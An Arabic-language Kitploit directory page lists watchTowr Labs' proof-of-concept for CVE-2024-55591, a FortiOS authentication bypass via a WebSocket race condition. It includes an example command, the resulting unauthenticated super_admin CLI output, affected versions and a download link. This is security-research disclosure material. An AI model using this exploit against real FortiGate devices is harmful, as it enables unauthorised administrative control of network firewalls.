Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/watchtowrlabs/fortios-auth-bypass-poc-cve-2024-55591
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةالمصادقةالفريق الأحمر
GitHubwatchtowrlabs/fortios-auth-bypass-poc-cve-2024-55591

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

fortios-auth-bypass-poc-CVE-2024-55591

إثبات مفهوم لاستغلال CVE-2024-55591، يوضح تجاوز المصادقة في واجهات إدارة FortiOS عبر حالة سباق WebSocket لتنفيذ أوامر CLI بدون مصادقة.

عرض المستودع
7719منذ سنة واحدةتمت المراجعة من قبل Kitploit

CVE-2024-55591

إثبات مفهوم لتجاوز المصادقة في Fortinet FortiOS

انظر منشور مدونتنا للتفاصيل التقنية

الكشف أثناء التنفيذ

root@kitploit:~
python CVE-2024-55591-PoC.py --host 192.168.1.5 --port 443 --command "get system status" --user watchTowr --ssl
             __         ___  ___________                   
     __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________ 
     \ \/ \/ \__  \    ___/ ___\|  |  \\|    | /  _ \ \/ \/ \_  __ \
      \     / / __ \|  | \  \\___|   Y  |    |(  <_> \     / |  | \
       \/\_/ (____  |__|  \\\\___  |___|__|__  | \\__  / \\/\_/  |__|   
                  \\          \\     \\                              

        CVE-2024-55591.py
        (*) Fortinet FortiOS Authentication Bypass (CVE-2024-55591) POC by watchTowr
        
          - Sonny , watchTowr ([email protected])

        CVEs: [CVE-2024-55591]

[*] Checking if target is a FortiOS Management interface
[*] Target is confirmed as a FortiOS Management interface
[*] Target is confirmed as vulnerable to CVE-2024-55591, proceeding with exploitation
Output from server: �m"watchTowr" "admin" "watchTowr" "super_admin" "watchTowr" "watchTowr" [13.37.13.37]:1337 [13.37.13.37]:1337

Output from server: �
get system status

Output from server: �~�FAKESERIAL # "Local_Process_Access" "Local_Process_Access" "root" "" "" "none" [x.x.x.x]:54546 [x.x.x.x]:443
Unknown action 0

FAKESERIAL # 
FAKESERIAL # get system status
Version: FortiGate-VM64-AWS v7.0.16,build0667,241001 (GA.M)
Security Level: High
Firmware Signature: certified
Virus-DB: 1.00000(2018-04-09 18:07)

الوصف

هذا السكريبت هو إثبات مفهوم لـ CVE-2024-55591، يستهدف واجهات إدارة FortiOS (Fortigate). من خلال إنشاء اتصالات WebSocket بالقوة الغاشمة لخلق حالة سباق (race condition) إلى جانب تجاوز المصادقة، يمكن إرسال أوامر CLI الخاصة بـ FortiOS بدون مصادقة. المزيد من التفاصيل موصوفة في منشور مدونتنا.

الإصدارات المتأثرة

  • FortiOS 7.0.0 إلى 7.0.16
  • FortiProxy 7.0.0 إلى 7.0.19
  • FortiProxy 7.2.0 إلى 7.2.12

مزيد من التفاصيل في تنبيه Fortinet

ملاحظة

هذا السكريبت ليس مصممًا للعمل مع FortiProxy، حيث تتحقق الفحوصات الأولية مما إذا كان المثيل هو واجهة إدارة FortiGate، لكن من المفترض أن التقنية الأساسية قابلة للتطبيق على أجهزة FortiProxy المتأثرة.

تابع watchTowr Labs

للحصول على أحدث الأبحاث الأمنية، تابع فريق watchTowr Labs

  • https://labs.watchtowr.com/
  • https://x.com/watchtowrcyber
تنزيل الأداة